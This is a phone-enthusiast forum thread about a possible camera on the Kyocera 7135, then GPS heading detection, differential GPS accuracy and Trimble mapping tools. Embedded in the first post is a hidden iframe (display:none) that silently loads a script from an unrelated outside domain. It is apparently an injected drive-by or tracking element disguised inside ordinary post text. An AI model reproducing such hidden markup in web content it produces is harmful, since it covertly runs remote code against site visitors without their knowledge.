+ Reply to Thread

7135 Next model integrated camera?!

Will the next model include an integrated camera????
    All that memory and no camera? Why not take a quick snap and save it to file for the your address book!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

how about cup of cofy?

Top Kyocera executive recently announced he wants to come out with a quality camera (1 MB pixels) within months, and next year have even better (3 MB). Don't know if it will be on 7135 or not.
    Probably another model since he also wants the latest and best color screen, too.

Programs for using pictures and video are going to be so cool. DoCoMo is streaming handheld video clips at 64 Kbps now.

On the Sony Ericsson P800 site, they have a Java applet showing their map program. Sends a picture of the intersections you come to and a picture of your destination as you would see. Also, plans are to have individuals to send their pictures in to improve the data base and keep up with road and building changes.

Really cool, is a Japanese software company is developing a map program that stays oriented to true north. As you walk and make turns the display rotates on your screen such that the direction in front of you stays at the top of the screen.

Originally posted by LonghairSteve

Really cool, is a Japanese software company is developing a map program that stays oriented to true north. As you walk and make turns the display rotates on your screen such that the direction in front of you stays at the top of the screen.
    GPS satellites can't tell what direction you're facing. I guess they could presume from your movement what direction you're facing. but once you stand still, there wouldn't be a reference point except where you were last facing.

Mapping software could, though, make a map that always shows N and map your movements. But the limit seems to be 2-3 meters of resolution, so the satellites won't be able to tell you've moved until you've covered ~10' forward motion.

Originally posted by jsimonson0
    GPS satellites can't tell what direction you're facing. I guess they could presume from your movement what direction you're facing. but once you stand still, there wouldn't be a reference point except where you were last facing.

Mapping software could, though, make a map that always shows N and map your movements. But the limit seems to be 2-3 meters of resolution, so the satellites won't be able to tell you've moved until you've covered ~10' forward motion.
    You are correct, they can't unless your moving or you have a Garmin Etrex Summit GPS with a built in digital compass. (which kicks in if your going slower than X mph after Y mins.)

However, I have found that If I move even a foot or two with my gps it kicks in right away and tells me my direction which makes me wonder if the the 2-3 meters of resolution is referring to the level of acurracy not nessarilly precision.
    iPhone therefore iAm.

Originally posted by LonghairSteve
    (1 MB pixels) ....have even better (3 MB).
    MB = Mega Bytes
    MP = Mega Pixels

With differential GPS (DGPS) accuracy is within 3 to 4 centimeters. And, using two-way communication in conjuction with continously operating reference stations the accuracy is now at 1 centimeter.

There are several ways to determine direction. Want to see how some farmers did it in 1998, go here:

http://www.prairie.mb.ca/rockmark.htm

Trimble has a good tutorial on GPS. As you may find, they can stand still with a virtual reference station and one person with a handheld immediately survey a map. Any person can sign up to set up a reference station using either your computer, server, or even WWW web site. Kind of like the SETI program.

Trimble is so connected using GPS, cellular, internet, and now bluetooth - all at the same time. Good example of what can be done today, check their site out:

http://www.trimble.com/gps/index.html